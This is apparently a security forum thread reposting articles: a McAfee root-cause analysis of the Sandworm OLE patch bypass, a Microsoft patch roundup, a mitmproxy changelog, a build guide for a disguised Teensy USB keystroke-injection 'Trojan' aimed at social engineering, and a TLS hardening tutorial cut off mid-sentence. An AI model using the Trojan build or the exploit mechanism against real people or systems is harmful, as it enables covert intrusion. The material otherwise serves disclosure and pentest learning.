attack toward disclosure. We incorporated product coverage for the OLE vulnerability with our network IPS, and so far, the signature we developed has not fired. However, for the attack techniques discussed, I think it is a only matter of time before we see them in the wild. Sursa: IBM X-Force Researcher Finds Significant Vulnerability in Microsoft Windows
  12. Bypassing Microsoft’s Patch for the Sandworm Zero Day: a Detailed Look at the Root Cause By Haifei Li on Nov 11, 2014 On October 21, we warned the public that a new exploitation method could bypass Microsoft’s official patch (MS14-060, KB3000869) for the infamous Sandworm zero-day vulnerability. As Microsoft has finally fixed the problem today via Security Bulletin MS14-064, it’s time to uncover our findings and address some confusion. This is the first of two posts on this issue. (McAfee has already delivered various protections against this threat to our customers.) Sandworm background This zero-day attack was disclosed at almost the same time that the patch was available on the last “Patch Tuesday” (October 14). We found that this is a very serious zero-day attack not only because the attack targeted many sensitive organizations (such as NATO), but also from the technical properties of the vulnerability and exploitation. This vulnerability is a logic fault. It’s not related to memory corruption (such as a heap-based overflow or use-after-free) so proven-effective exploitation mitigations such as ASLR and DEP on Windows 7 or later will fail to block the exploit. Nor can Microsoft’s enhanced security tool Enhanced Mitigation Experience Toolkit (EMET) block the attack by default. Though the in-the-wild samples are organized as PowerPoint Show (.ppsx) files, this is due to a vulnerability in the Windows Packager COM object (packager.dll). Considering that COM objects are OS-wide function providers, any applications installed on the system can invoke them, which means that other formats can be attacks paths as well. This indicates that all Windows users, not only Office users, are at risk. The attack has been going on for quite a long time. For example, an exploit generator found on VirusTotal suggests that the vulnerability was discovered in June 2013. Microsoft’s patch and two bypasses On October 17, three days after its release, we found that Microsoft’s patch could be bypassed with some tricks. We reported our findings to Microsoft on the same day, which lead to an emergency Security Advisory 3010060, released October 21, with a temporary “Fix It.” We created a proof of concept (PoC) demonstrating the bypass. We later learned that some other parties, including the Google Security Team, have detected in-the-wild samples that are said to bypass the patch. We analyzed some samples in the wild, and found that they will trigger a user account control (UAC) warning when one logs in with a standard nonadministrator account. However, users on an administrator account or who have disabled the UAC will not see the warning, and the malicious code will execute automatically. Our PoC takes another path and does not trigger the UAC at all. Thus our PoC is a full bypass while the in-the-wild samples are a partial bypass. At the root The vulnerability exists in the Packager object. In fact, there are two issues rather than one. The first issue allows an attacker to drop an arbitrary file into the temp folder. (We warned the public about this security issue in a July post. Anyone who followed our advice at that time, preventing Office from invoking the Packager object, is immune to the Sandworm attack.) The second issue is the core of the matter. While the former allows only the writing of a file into the temp folder, the latter allows an attacker to “execute” the file from the temp folder. Let’s take a closer look at how it works. Looking at the slide definition XML file inside the .ppsx sample, we find something interesting at the following lines: The “verb” definition in slide1.xml. The Packager is an OLE object that supports embedding one file into another container application. As described on this MSDN page, OLE objects that provide embedding functions must expose the interface IOleObject. For the preceding XML definition, this calls the DoVerb() method of this IOleObject. Another MSDN page provides the prototype of this method: Prototype of the IOleObject::DoVerb() function. And the following shows the location of the IOleObject and the DoVerb() function in the packager.dll: The IOleObject interface and the DoVerb() function in packager.dll. The string “cmd=3? in the slide1.xml suggests that the value of the first parameter (iVerb) is 3. Depending on different values of iVerb, we see a switch to different code in IOleObject::DoVerb(). Following we have the REed code (source code generated through reverse engineering) when iVerb equals 3. The REed code for handling iVerb=3 in the IOleObject::DoVerb() function. With further research and testing, we realized that this code performs the same action as clicking the second item on the following menu after right-clicking the filename, as shown here. (The print in red is our addition.) The “right-click” menu for .inf file. Reading the whole code of IOleObject::DoVerb(), we see that depending on different values of iVerb, the code will switch to different code paths. We split them into two situations. For iVerb values greater than or equal to 3, the code will perform the same action as clicking on the pop-up menu. As we see in the REed code, it subtracts the fixed value 2 from the iVerb value 3, with the result 1, which represents the second item on the right-click menu. We can also invoke any command below “Install” on the menu by supplying a larger iVerb value. For example, if we want to click the third item on the preceding menu, we can set iVerb=4 (“cmd=4”) in the slide definition file. For an iVerb value less than 3, the program will follow other code that we have not shown. These actions, such as performing the default action (iVerb=2) or renaming the display name of the Packager object (iVerb=1), are handled well from a security point of view. We are focusing on the first situation: When the iVerb value is greater than or equal to 3, it will effectively click “Install” or a lower choice from the pop-up menu for the specific file. For a .inf file, the right-click menu will appear exactly as in our image for a default Windows setup. Thus, in this example “InfDefaultInstall.exe” will execute and various bad thing will happen. In this post, we have introduced the case and explained the essence of the vulnerability. In a second part, we will discuss the MS14-060 patch, how to bypass it, and more. Watch this space for our next post. Sursa: http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-even-editing-dangerous
  13. [h=1]Microsoft patches Windows, IE; holds back two updates[/h] Summary: The most serious vulnerability could allow an attacker to gain control of a Windows Server just by sending packets. For undisclosed reasons, Microsoft withheld two updates scheduled for release. By Larry Seltzer for Zero Day | November 11, 2014 -- 19:04 GMT (11:04 PST) Microsoft today released 14 security updates to address 33 vulnerabilities in Windows, Internet Explorer and Office. Two updates scheduled for release today (MS14-068 and MS14-075) were withheld and their release date is yet to be determined. The most severe of the vulnerabilities may be MS14-066 which could allow remote, unauthenticated compromise of Windows servers. Two of the vulnerabilities are being exploited in the wild. For one of them, Microsoft had previously released a "Fix it" to block the known attacks. MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) — Two vulnerabilities could allow system exploit through an OLE client such as PowerPoint. One is being exploited in the wild and the one for which Microsoft provided a Fix it. That Fix it only addresses specific attacks, whereas this update fixes the underlying vulnerability. See the Microsoft KB page for a link to remove the Fix it. MS14-065: Cumulative Security Update for Internet Explorer (3003057) — This update fixes 17 vulnerabilities in Internet Explorer. Many are rated critical and all versions of IE are affected. Internet Explorer 11, the most current version, has six vulnerabilities rated critical. Microsoft also says that working exploit code is possible for nearly all of the 17. MS14-066: Vulnerability in Schannel Could Allow Remote Code Execution (2992611) — This is a highly-severe vulnerability which could allow an attacker to execute code on a Windows Server in a highly-privileged context just by sending specially-crafted packets to it. Microsoft lists no mitigating factors. MS14-067: Vulnerability in XML Core Services Could Allow Remote Code Execution (2993958) — A malicious web site could compromise a client through Internet Explorer. MS14-069: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (3009710) — Word 2007 SP3, the Word Viewer and Office Compatibility Pack Service Pack 3 can all be exploited through specially-crafted files. MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) — An attacker can gain elevated privilege through a flaw in the Windows TCP/IP client (IPv4 or IPv6). MS14-071: Vulnerability in Windows Audio Service Could Allow Elevation of Privilege (3005607) — This vulnerability would need to be used along with another in order to be exploited. MS14-072: Vulnerability in .NET Framework Could Allow Elevation of Privilege (3005210) — An attacker could gain elevated privilege by sending specially-crafted data to a client or server that uses .NET Remoting. All versions of Windows are affected. MS14-073: Vulnerability in Microsoft SharePoint Foundation Could Allow Elevation of Privilege (3000431) — An authenticated attacker could run arbitrary script at server privileges on Microsoft SharePoint Foundation 2010 Service Pack 2. MS14-074: Vulnerability in Remote Desktop Protocol Could Allow Security Feature Bypass (3003743) — An RDP (Remote Desktop Protocol) system could be induced not to log events properly, but Microsoft considers working exploit code unlikely. MS14-076: Vulnerability in Internet Information Services (IIS) Could Allow Security Feature Bypass (2982998) — A user could bypass IIS restrictions on users and IP addresses. Microsoft considers working exploit code unlikely. MS14-077: Vulnerability in Active Directory Federation Services Could Allow Information Disclosure (3003381) — If a user leaves a browser open after logging out of an application, another user could reopen the application in the browser immediately after the first user logged off. Microsoft considers a working exploit unlikely. MS14-078: Vulnerability in IME (Japanese) Could Allow Elevation of Privilege (3005210) — Sandbox escape is possible on the IME (Input Method Editor) (Japanese). This attack is being exploited in the wild. MS14-079: Vulnerability in Kernel Mode Driver Could Allow Denial of Service (3002885) — If a user used Windows Explorer to browse a network share that contained a specially-crafted TryeType font, the system could become unresponsive. Users of Microsoft's EMET (Enhanced Mitigation Experience Toolkit), a tool for hardening applications against attack, should upgrade the tool to the new version 5.1 before applying today's Internet Explorer updates. Microsoft has said that the updates cause problems for users of version 5.0 of EMET. The MS14-066 update also includes support for new SSL/TLS cipher suites. The new suites "...all operate in Galois/counter mode (GCM), and two of them offer perfect forward secrecy (PFS) by using DHE key exchange together with RSA authentication." Microsoft also released a new version of Flash Player integrated into Internet Explorer 10 and 11 to address vulnerabilities disclosed today by Adobe. The new version of the Windows Malicious Software Removal Tool (KB890830) removes malware from the Win32/Tofsee and Win32/Zoxpng families, according to a blog from the Microsoft Malware Protection Center. Microsoft also released several non-security updates. Based on prior experience. the links to these will become live through the course of the day Tuesday. Update for Windows 8.1, Windows RT 8.1, Windows 8, and Windows RT (KB2976536); Update for Windows 8, Windows RT, and Windows Server 2012 (KB3000853) Update for Windows 8 and Windows RT (KB3003663) Update for Windows 8.1 and Windows RT 8.1 (KB3003667) Update for Windows 8.1 (KB3003727) Update for Windows 7 (KB3004469) Update for Windows 8.1, Windows Server 2012 R2, Windows 8, Windows Server 2012, Windows 7, Windows Server 2008 R2, and Windows Server 2008 (KB3004908) Update for Windows 8.1 and Windows RT 8.1 (KB3006178) Update for Windows 8.1 for x64-based Systems (KB3006958) Update for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2 (KB3008188) Update for Windows 8.1, Windows RT 8.1, Windows Server 2012 R2, Windows 8, Windows RT, Windows Server 2012, Windows 7, Windows Server 2008 R2, and Windows Server 2008 (KB3008627) Sursa: Microsoft patches Windows, IE; holds back two updates | ZDNet FACETI UPDATE LA WINDOWS!
  14. [h=1]mitmproxy and pathod 0.11[/h]07 November 2014 I'm happy to announce that we've just released v0.11 of both mitmproxy and pathod. This release features a huge revamp of mitmproxy's internals and a long list of important features. Pathod has much improved SSL support and fuzzing. Our thanks to the many testers and contributors that helped get this out the door. Please lodge bug reports and feature requests here. [h=1]MITMPROXY CHANGELOG[/h] Performance improvements for mitmproxy console SOCKS5 proxy mode allows mitmproxy to act as a SOCKS5 proxy server Data streaming for response bodies exceeding a threshold (bradpeabody@gmail.com) Ignore hosts or IP addresses, forwarding both HTTP and HTTPS traffic untouched Finer-grained control of traffic replay, including options to ignore contents or parameters when matching flows (marcelo.glezer@gmail.com) Pass arguments to inline scripts Configurable size limit on HTTP request and response bodies Per-domain specification of interception certificates and keys (see --cert option) Certificate forwarding, relaying upstream SSL certificates verbatim (see --cert-forward) Search and highlighting for HTTP request and response bodies in mitmproxy console (pedro@worcel.com) Transparent proxy support on Windows Improved error messages and logging Support for FreeBSD in transparent mode, using pf (zbrdge@gmail.com) Content view mode for WBXML (davidshaw835@air-watch.com) Better documentation, with a new section on proxy modes Generic TCP proxy mode Countless bugfixes and other small improvements [h=1]PATHOD CHANGELOG[/h] Hugely improved SSL support, including dynamic generation of certificates using the mitproxy cacert pathoc -S dumps information on the remote SSL certificate chain Big improvements to fuzzing, including random spec selection and memoization to avoid repeating randomly generated patterns Reflected patterns, allowing you to embed a pathod server response specification in a pathoc request, resolving both on client side. This makes fuzzing proxies and other intermediate systems much better. Sursa: cortesi - mitmproxy and pathod 0.11
  15. [h=3]Making a USB flash drive HW Trojan[/h] [h=2]Preface[/h] When I first read Adrian Crenshaw’s [1] and Netragard’s [2] articles about malicious Human Interface Devices (HID) I was really impressed and decided to create my own just to try it out how hard it is to assemble one and see if there's any space for improvements. My first attempt was a USB flash drive-like tool. The main goal was to make it as small and convincingly looking as possible. The result was a device in an enclosure with the dimensions of 8.7mm x 71mm x 23mm, fancy enough to fool someone in a social engineering engagement. Now, the above mentioned articles have a lot of details about malicious HIDs, mostly about how to program them, but they say little about how to MAKE them. So in this blog post, I will give you a step-by-step tutorial how to prepare a USB flash drive HW Trojan (actually, you can use it as a neat, fully functional USB drive as well) using a Teensy 2.0 and Teensy SD Adaptor. I am going to assume that you have at least some basic experience with soldering. If you don't have, take a look at Limor Fried's (a.k.a. ladyada) page about the basics of soldering or Sparkfun's Soldering Basics (takes about 40-30 minutes practicing to learn how to solder through hole components). [h=2]Parts needed[/h] Teensy 2.0 Teensy SD Adaptor (you can use other SD card adaptors too, but the Teensy SD Adaptor is one of the smallest on the market) Micro SD Card (you can use a Micro SDHC Card as well, up to 16 GB) USB A type plug (male) PCB connector (I would NOT recommend using a cable connector, since it's bigger. However, it doesn't matter if you use SMD or Through-hole type, but I prefer the Through-hole type) USB MINI-B type plug (male) Cable connector (I would NOT recommend using a PCB connector, since it's bigger.) Enclosure (I used this one, but it's transparent, so it's is probably better for demonstration purposes and not the best for social engineering. I would recommend using something like this, or you can paint the transparent one to whatever color you want) Wires (I would suggest using at least 6/7 different colors) Anyway, here's a picture of all the parts together, except the wires: [h=2]Tools needed[/h] Solder (for soldering, of course) Soldering iron (yep, this one is also for soldering) Desoldering tool or (De)solder braid (if you are clumsy and make a soldering error, like an unwanted short circuit) Hot glue gun (I used this for the USB A to USB MINI-B converter, but you can use whatever glue/solution you want) Flush/diagonal cutters (for cutting the wires) Third hand with Magnifying Glass (you're gonna need it, otherwise you would have to grow a third hand ) Good light (without this, you won't be able to solder those tiny little wires...) [h=2] STEP 1: Make a small USB A type plug (male) connector to USB MINI-B type plug (male) connector converter[/h] The first thing we need to prepare is a USB connector converter, since the Teensy 2.0 has a USB MINI-B type jack (female) USB connector, but PCs/Laptops usually only have USB A type jack (female) connectors. We need to make one of our own in order to reduce the size of our device. As you will see on the pictures below, the converters you can buy are all nice and shiny, but the one I have made is almost 2/3 of their size. TIPP: Alternatively, you can de-solder the USB MINI connector from the Teensy and connect the pins directly to a USB A type connector, thus making the hole device even smaller (I preferred keeping my Teensy intact for this prototype). First, let's take a look at pinout.ru for the USB pinout and wiring! As you can see, USB has only 4 pins, or 5 in case of USB MINI, but we can ignore this 5th ID pin for now. Now the thing is, that I don't have pictures about soldering the wires one-by-one, but I draw a few figures about the wiring, so the only thing you need to do is connect the pins of the connectors by soldering in the wires according to these instructions. First, let's see the two connectors with the pins! (Sidenote: sorry for the lame pictures... by the time I wrote the post I didn't have any USB connectors with me to make my own photos, so I took something from the Internet. Still, I hope you'll get the general idea from these ones as well.) For the USB A type plug connector, the pins are the following: I like folding the two legs of the metal part on the USB A connector (the ones in the red circles on the picture) to the side, so it's overall height will be the height of the connector, and it will also help keeping the Teensy in one place inside the enclosure (you will see this on the pictures below), or, you can just cut them off. If you buy a USB MINI-B type plug connector, then it's usually comes "unassembled" in three or four parts, but you only need the following two parts (pins are numbered on the "actual" connector part): You should cut off half of the metallic part (along the red doted line), get rid of the part which is marked with a red x on the picture and only keep the part holding the "actual" connector part (marked with a green check mark on the picture). IMPORTANT: The side where I marked the pins is not the one where you will have to solder the wires!!! It's on the other side! Obviously, the order of the pins is the same on the other side as well. (Sorry, but I couldn't find a good picture on the Internet to mark the pins on the side where you actually need to do the soldering. I hope you will be able to figure out this one on your own.) And now, let's see how we should connect them! It's pretty simple, basically you just have to connect each pin of a connector to the same pin of the other connector. I like using red (pin 1), white (pin 2), green (pin 3) and black (pin 4) wires when I work with USB, so I can easily distinguish which wire goes into which pin (the lines on the picture also follow this convention): Make sure that you use as short wires as possible, ideally no longer than 1 cm, so they don't need much space. Soldering can be quite tricky, but keep on trying until you succeed, otherwise it won't fit into the enclosure. Once you have them wired up, you can use for example a hot glue gun to cover the solder joints and protect them from falling apart. Here's a picture from the commercially available and the home-made connector from the "bottom": Same thing, from the "top": Last, but not least, from the side: As you can see, the result is quite small and thin (even though it's a bit ugly, but this is not a beauty contest), so it won't need a lot of valuable space in the enclosure. [h=2] STEP 2: Connecting the Teensy with the Teensy SD adaptor[/h] The next step is to connect the Teensy with the Teensy SD Adaptor. Like I said, you can use a different SD card adapter too, but this one fits nicely on the top of a Teensy, so I will give instructions for this adapter. You can find the technical documentation on the PJRC website for the Teensy SD Adapter. The most important part is the pinout of the adapter (I took the liberty and reused the pictures from the PJRC website): We need to connect the MISO, MOSI, SCLK, SS, Ground and +5V pins. The SW (Switch) pin is not needed for now, but you can solder it too (I did, so you will see that the SW pin is connected on the pictures below). The way you need to connect the Teensy with the Teensy SD Adapter is the following: Note, that according to the above picture the Teensy's top side will face forwards the top side of the Teensy SD Adaptor. Once you place a Micro SD card into the card slot, the Teensy SD Adaptor will fit perfectly between the USB connector of the Teensy and the push button. IMPORTANT: The top side of the Teensy SD Adaptor has the metallic surface of the Micro SD card slot that will be in contact with the top side of the Teensy board. When you plug in the assembled Teensy to a USB port, the microcontroller will get really hot, really soon. This is because the metallic part of the SD card adaptor makes a short circuit on the capacitors on the Teensy's top as you squeeze them together. In order to prevent this from happening, I used a small piece of insulation tape stuck on the metallic part of the Micro SD card slot. The end result from the top should look like this: Notice that the wires on the top are placed next to each other and they don't cross, so they won't increase the height of the final product. Same thing, from one side: From the other side (barely visible, but you can see the small piece of black insulation tape too): [h=2] STEP 3: Putting everything together[/h] The last thing we need to do is connecting the USB A to USB MINI-B converter to the Teensy + Teensy SD Adaptor part and put them into an enclosure. The two parts connected together should look something like this: Putting them into a nice casing: [h=2]Final product[/h] Aaand, that's all! Later, I will make a detailed blog post on how can you program such a device and what evil payloads you can use. There are a few other pictures I have made and some additional resources on malicious HIDs that you can find below. Final product from the "top": Final product from the side: When the device is plugged into a PC: [h=2]Resources[/h] [1] Programmable HID USB Keystroke Dongle: Using the Teensy as a pen testing device Programmable HID USB Keystroke Dongle: Using the Teensy as a pen testing device [2] Netragard’s Hacker Interface Device (HID) http://pentest.snosoft.com/2011/06/24/netragards-hacker-interface-device-hid Posted by Dávid Szili at 10:44:00 AM Sursa: Jump ESP, jump!: Making a USB flash drive HW Trojan
  16. Deploying TLS the hard way October, 27th 2014 How does TLS work? The certificate (Perfect) Forward Secrecy Choosing the right cipher suites HTTP Strict Transport Security HSTS Preload List OCSP Stapling HTTP Public Key Pinning Known attacks Last weekend I finally deployed TLS for timtaubert.de and decided to write up what I learned on the way hoping that it would be useful for anyone doing the same. Instead of only giving you a few buzz words I want to provide background information on how TLS and certain HTTP extensions work and why you should use them or configure TLS in a certain way. One thing that bugged me was that most posts only describe what to do but not necessarily why to do it. I hope you appreciate me going into a little more detail to end up with the bigger picture of what TLS currently is, so that you will be able to make informed decisions when deploying yourselves. To follow this post you will need some basic cryptography knowledge. Whenever you do not know or understand a concept you should probably just head over to Wikipedia and take a few minutes or just do it later and maybe re-read the whole thing. Disclaimer: I am not a security expert or cryptographer but did my best to research this post thoroughly. Please let me know of any mistakes I might have made and I will correct them as soon as possible. But didn’t Andy say this is all shit? I read Andy Wingo’s blog post too and I really liked it. Everything he says in there is true. But what is also true is that TLS with the few add-ons is all we have nowadays and we better make the folks working for the NSA earn their money instead of not trying to encrypt traffic at all. After you finished reading this page, maybe go back to Andy’s post and read it again. You might have a better understanding of what he is ranting about than you had before if the details of TLS are still dark matter to you. So how does TLS work? Every TLS connection starts with both parties sharing their supported TLS versions and cipher suites. As the next step the server sends its X.509 certificate to the browser. Checking the server’s certificate The following certificate checks need to be performed: Does the certificate contain the server’s hostname? Was the certificate issued by a CA that is in my list of trusted CAs? Does the certificate’s signature verify using the CA’s public key? Has the certificate expired already? Was the certificate revoked? All of these are very obvious crucial checks. To query a certificate’s revocation status the browser will use the Online Certificate Status Protocol (OCSP) which I will describe in more detail in a later section. After the certificate checks are done and the browser ensured it is talking to the right host both sides need to agree on secret keys they will use to communicate with each other. Key Exchange using RSA A simple key exchange would be to let the client generate a master secret and encrypt that with the server’s public RSA key given by the certificate. Both client and server would then use that master secret to derive symmetric encryption keys that will be used throughout this TLS session. An attacker could however simply record the handshake and session for later, when breaking the key has become feasible or the machine is suspect to a vulnerability. They may then use the server’s private key to recover the whole conversation. Key Exchange using (EC)DHE When using (Elliptic Curve) Diffie-Hellman as the key exchange mechanism both sides have to collaborate to generate a master secret. They generate DH key pairs (which is a lot cheaper than generating RSA keys) and send their public key to the other party. With the private key and the other party’s public key the shared master secret can be calculated and then again be used to derive session keys. We can provide Forward Secrecy when using ephemeral DH key pairs. See the section below on how to enable it. We could in theory also provide forward secrecy with an RSA key exchange if the server would generate an ephemeral RSA key pair, share its public key and would then wait for the master secret to be sent by the client. As hinted above RSA key generation is very expensive and does not scale in practice. That is why RSA key exchanges are not a practical option for providing forward secrecy. After both sides have agreed on session keys the TLS handshake is done and they can finally start to communicate using symmetric encryption algorithms like AES that are much faster than asymmetric algorithms. The certificate Now that we understand authenticity is an integral part of TLS we know that in order to serve a site via TLS we first need a certificate. The TLS protocol can encrypt traffic between two parties just fine but the certificate provides the necessary authentication towards visitors. Without a certificate a visitor could securely talk to either us, the NSA, or a different attacker but they probably want to talk to us. The certificate ensures by cryptographic means that they established a connection to our server. Selecting a Certificate Authority (CA) If you want a cheap certificate, have no specific needs, and only a single subdomain (e.g. www) then StartSSL is an easy option. Do of course feel free to take a look at different authorities - their services and prices will vary heavily. In the chain of trust the CA plays an important role: by verifying that you are the rightful owner of your domain and signing your certificate it will let browsers trust your certificate. The browsers do not want to do all this verification themselves so they defer it to the CAs. For your certificate you will need an RSA key pair, a public and private key. The public key will be included in your certificate and thus also signed by the CA. Generating an RSA key and a certificate signing request The example below shows how you can use OpenSSL on the command line to generate a key for your domain. Simply replace example.com with the domain of your website. example.com.key will be your new RSA key and example.com.csr will be the Certificate Signing Request that your CA needs to generate your certificate. openssl req -new -newkey rsa:4096 -nodes -sha256 \ -keyout example.com.key -out example.com.csr We will use a SHA-256 based signature for integrity as Firefox and Chrome will phase out support for SHA-1 based certificates soon. The RSA keys used to authenticate your website will use a 4096 bit modulus. If you need to handle a lot of traffic or your server has a weak CPU you might want to use 2048 bit. Never go below that as keys smaller than 2048 bit are considered insecure. Get a signed certificate Sign up with the CA you chose and depending on how they handle this process you probably will have to first verify that you are the rightful owner of the domain that you claim to possess. StartSSL will do that by sending a token to postmaster@example.com (or similar) and then ask you to confirm the receipt of that token. Now that you signed up and are the verified owner of example.com you simply submit the example.com.csr file to request the generation of a certificate for your domain. The CA will sign your public key and the other information contained in the CSR with their private key and you can finally download the certificate to example.com.crt. Upload the .crt and .key files to your web server. Be aware that any intermediate certificate in the CA’s chain must be included in the .crt file as well - you can just cat them together. StartSSL’s free tier has an intermediate Class 1 certificate - make sure to use the SHA-256 version of it. All files should be owned by root and must not be readable by anyone else. Configure your web server to use those and you should probably have TLS running configured out-of-the-box. (Perfect) Forward Secrecy To properly deploy TLS you will want to provide (Perfect) Forward Secrecy. Without forward secrecy TLS still seems to secure your communication today, it might however not if your private key is compromised in the future. If a powerful adversary (think NSA) records all communication between a visitor and your server, they can decrypt all this traffic years later by stealing your private key or going the “legal” way to obtain it. This can be prevented by using short-lived (ephemeral) keys for key exchanges that the server will throw away after a short period. Diffie-Hellman key exchanges Using RSA with your certificate’s private and public keys for key exchanges is off the table as generating a 2048+ bit prime is very expensive. We thus need to switch to ephemeral (Elliptic Curve) Diffie-Hellman cipher suites. For DH you can generate a 2048 bit parameter once, choosing a private key afterwards is cheap. openssl dhparam -out dhparam.pem 2048 Simply upload dhparam.pem to your server and instruct the web server to use it for Diffie-Hellman key exchanges. When using ECDH the predefined elliptic curve represents this parameter and no further action is needed. (Nginx) ssl_dhparam /path/to/ssl/dhparam.pem; Apache does unfortunately not support custom DH parameters, it is always set to 1024 bit and is not user configurable. This might hopefully be fixed in future versions. Session IDs One of the most important mechanisms to improve TLS performance is Session Resumption. In a full handshake the server sends a Session ID as part of the “hello” message. On a subsequent connection the client can use this session ID and pass it to the server when connecting. Because both the server and the client have saved the last session’s “secret state” under the session ID they can simply resume the TLS session where they left off. Now you might notice that this could violate forward secrecy as a compromised server might reveal the secret state for all session IDs if the cache is just large enough. The forward secrecy of a connection is thus bounded by how long the session information is retained on the server. Ideally, your server would use a medium-sized in-memory cache that is purged daily. Apache lets you configure that using the SSLSessionCache directive and you should use the high-performance cyclic buffer shmcd. Nginx has the ssl_session_cache directive and you should use a shared cache that is shared between workers. The right size of those caches would depend on the amount of traffic your server handles. You want browsers to resume TLS sessions but also get rid of old ones about daily. Session Tickets The second mechanism to resume a TLS session are Session Tickets. This extension transmits the server’s secret state to the client, encrypted with a key only known to the server. That ticket key is protecting the TLS connection now and in the future. This might as well violate forward secrecy if the key used to encrypt session tickets is compromised. The ticket (just as the session cache) contains all of the server’s secret state and would allow an attacker to reveal the whole conversation. Nginx and Apache by default generate a session ticket key at startup and do unfortunately provide no way to rotate it. If your server is running for months without a restart then you will use that same session ticket key for months and breaking into your server could reveal every recorded TLS conversation since the web server was started. Neither Nginx nor Apache have a sane way to work around this, Nginx might be able to rotate the key by reloading the server config which is rather easy to implement with a cron job. Make sure to test that this actually works before relying on it though. Thus if you really want to provide forward secrecy you should disable session tickets using ssl_session_tickets off for Nginx and SSLOpenSSLConfCmd Options -SessionTicket for Apache. Choosing the right cipher suites Mozilla’s guide on server side TLS provides a great list of modern cipher suites that needs to be put in your web server’s configuration. The combinations below are unfortunately supported by only modern browsers, for broader client support you might want to consider using the “intermediate” list. ECDHE-RSA-AES128-GCM-SHA256: \ ECDHE-ECDSA-AES128-GCM-SHA256: \ ECDHE-RSA-AES256-GCM-SHA384: \ ECDHE-ECDSA-AES256-GCM-SHA384: \ DHE-RSA-AES128-GCM-SHA256: \ DHE-DSS-AES128-GCM-SHA256: \ [...] !aNULL:!eNULL:!EXPORT:!DES:!RC4:!3DES:!MD5:!PSK All these cipher suites start with (EC)DHE which means they only support ephemeral Diffie-Hellman key exchanges for forward secrecy. The last line discards non-authenticated key exchanges, null-encryption (cleartext), legacy weak ciphers marked exportable by US law, weak ciphers (3)DES and RC4, weak MD5 signatures, and pre-shared keys. Note: To ensure that the order of cipher suites is respected you need to set ssl_prefer_server_ciphers on for Nginx or SSLHonorCipherOrder on for Apache. HTTP Strict Transport Security (HSTS) Now that your server is configured to accept TLS connections you still want to support HTTP connections on port 80 to redirect old links and folks typing example.com in the URL bar to your shiny new HTTPS site. At this point however a Man-In-The-Middle (or Woman-In-The-Middle) attack can easily intercept and modify traffic to deliver a forged HTTP version of your site to a visitor. The poor visitor might never know because they did not realize you offer TLS connections now. To ensure your users are secured when visiting your site the next time you want to send a HSTS header to enforce strict transport security. By sending this header the browser will not try to establish a HTTP connection next time but directly connect to your website via TLS. Strict-Transport-Security: max-age=15768000; includeSubDomains; preload Sending these headers over a HTTPS connection (they will be ignored via HTTP) lets the browser remember that this domain wants strict transport security for the next six months (~15768000 seconds). The includeSubDomains token enforces TLS connections for every subdomain of your domain and the non-standard preload token will be required for the next section. HSTS Preload List If after deploying TLS the very first connection of a visitor is genuine we are fine. Your server will send the HSTS header over TLS and the visitor’s browser remembers to use TLS in the future. The very first connection and every connection after the HSTS header expires however are still vulnerable to a {M,W}ITM attack. To prevent this Firefox and Chrome share a HSTS Preload List that basically includes HSTS headers for all sites that would send that header when visiting anyway. So before connecting to a host Firefox and Chrome check whether that domain is in the list and if so would not even try using an insecure HTTP connection. Including your page in that list is easy, just submit your domain using the HSTS Preload List submission form. Your HSTS header must be set up correctly and contain the includeSubDomains and preload tokens to be accepted. OCSP Stapling OCSP - using an external server provided by the CA to check whether the certificate given by the server was revoked - might sound like a great idea at first. On the second thought it actually sounds rather terrible. First, the CA providing the OCSP server suddenly has to be able to handle a lot of requests: every client opening a connection to your server will want to know whether your certificate was revoked before talking to you. Second, the browser contacting a CA and passing the certificate is an easy way to monitor a user’s browsing behavior. If all CAs worked together they probably could come up with a nice data set of TLS sites that people visit, when and in what order (not that I know of any plans they actually wanted to do that). Let the server do the work for your visitors OCSP Stapling is a TLS extension that enables the server to query its certificate’s revocation status at regular intervals in the background and send an OCSP response with the TLS handshake. The stapled response itself cannot be faked as it needs to be signed with the CA’s private key. Enabling OCSP stapling thus improves performance and privacy for your visitors immediately. You need to create a certificate file that contains your CA’s root certificate prepended by any intermediate certificates that might be in your CA’s chain. StartSSL has an intermediate certificate for Class 1 (the free tier) - make sure to use the one having the SHA-256 signature. Pass the file to Nginx using the ssl_trusted_certificate directive and to Apache using the SSLCACertificateFile directive. OCSP Must Staple OCSP however is unfortunately not a silver bullet. If a browser does not know in advance it will receive a stapled response then the attacker might as well redirect HTTPS traffic to their server and block any traffic to the OCSP server (in which case browsers soft-fail). Adam Langley explains all possible attack vectors in great detail. One solution might be the proposed OCSP Must Staple Extension. This would add another field to the certificate issued by the CA that says a server must provide a stapled OCSP response. The problem here is that the proposal expired and in practice it would take years for CAs to support that. Another solution would be to implement a header similar to HSTS, that lets the browser remember to require a stapled OCSP response when connecting next time. This however has the same problems on first connection just like HSTS, and we might have to maintain a “OCSP-Must-Staple Preload List”. As of today there is unfortunately no immediate solution in sight. HTTP Public Key Pinning (HPKP) Even with all those security checks when receiving the server’s certificate we would still be completely out of luck in case your CA’s private key is compromised or your CA simply fucks up. We can prevent these kinds of attacks with an HTTP extension called Public Key Pinning. Key pinning is a trust-on-first-use (TOFU) mechanism. The first time a browser connects to a host it lacks the the information necessary to perform “pin validation” so it will not be able to detect and thwart a {M,W}ITM attack. This feature only allows detection of these kinds of attacks after the first connection. Generating a HPKP header Creating an HPKP header is easy, all you need to do is to compute the base64-encoded “SPKI fingerprint” of your server’s certificate. An SPKI fingerprint is the output of applying SHA-256 to the public key information contained in your certificate. openssl req -inform pem -pubkey -noout < example.com.csr | openssl pkey -pubin -outform der | openssl dgst -sha256 -binary | base64 The result of running the above command can be directly used as the pin-sha256 values for the Public-Key-Pins header as shown below: Public-Key-Pins: pin-sha256="GRAH5Ex+kB4cCQi5gMU82urf+6kEgbVtzfCSkw55AGk="; pin-sha256="lERGk61FITjzyKHcJ89xpc6aDwtRkOPAU0jdnUqzW2s="; max-age=15768000; includeSubDomains Upon receiving this header the browser knows that it has to store the pins given by the header and discard any certificates whose SPKI fingerprints do not match for the next six months (max-age=15768000). We specified the includeSubDomains token so the browser will verify pins when connecting to any subdomain. Include the pin of a backup key It is considered good practice to include at least a second pin, the SPKI fingerprint of a backup RSA key that you can generate exactly as the original one: openssl req -new -newkey rsa:4096 -nodes -sha256 \ -keyout example.com.backup.key -out example.com.backup.csr In case your private key is compromised you might need to revoke your current 